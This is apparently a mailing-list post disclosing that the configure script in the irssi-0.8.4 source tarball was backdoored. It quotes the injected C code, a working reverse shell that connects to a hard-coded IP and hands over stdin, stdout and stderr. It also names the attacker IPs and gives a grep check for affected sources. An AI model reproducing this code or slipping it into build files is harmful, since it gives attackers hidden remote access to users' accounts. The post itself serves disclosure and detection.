irssi backdoored.

[Martin Östlund <martin () webtech se>]

Hi readers.

I just discovered this on the irssi homepage (irssi is a new, popular
IRC chat client for those who didnt know).

"Just noticed, not sure for how long it's been there. I heard the first
change in the irssi-0.8.4.tar.gz's checksum was 2002/04/19. Guess I'll
have to start watching those myself from now on.. I'm moving the
main.irssi.org elsewhere for now, mirrors should pick up the DNS change
and update themselves automatically..
This code was found from configure - it forks a new process, connects to
some server and gives stdin/out/err to it (ie. giving remote access to
your account):

       int s;
        struct sockaddr_in sa;
        switch(fork()) { case 0: break; default: exit(0); }
        if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
                exit(1);
        }
 /* HP/UX 9 (%@#!) writes to sscanf strings */
        memset(&sa, 0, sizeof(sa));
        sa.sin_family = AF_INET;
        sa.sin_port = htons(6667);
        sa.sin_addr.s_addr = inet_addr("204.120.36.206");
        if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
                exit(1);
        }
        dup2(s, 0); dup2(s, 1); dup2(s, 2);

Also the IP just changed yesterday from 209.164.15.215. If you still
have the irssi sources, you can see if you're affected with grep
SOCK_STREAM configure - if it returns anything, something might have
been done to your system."

  - End of quote.

Take care,
Martin Östlund.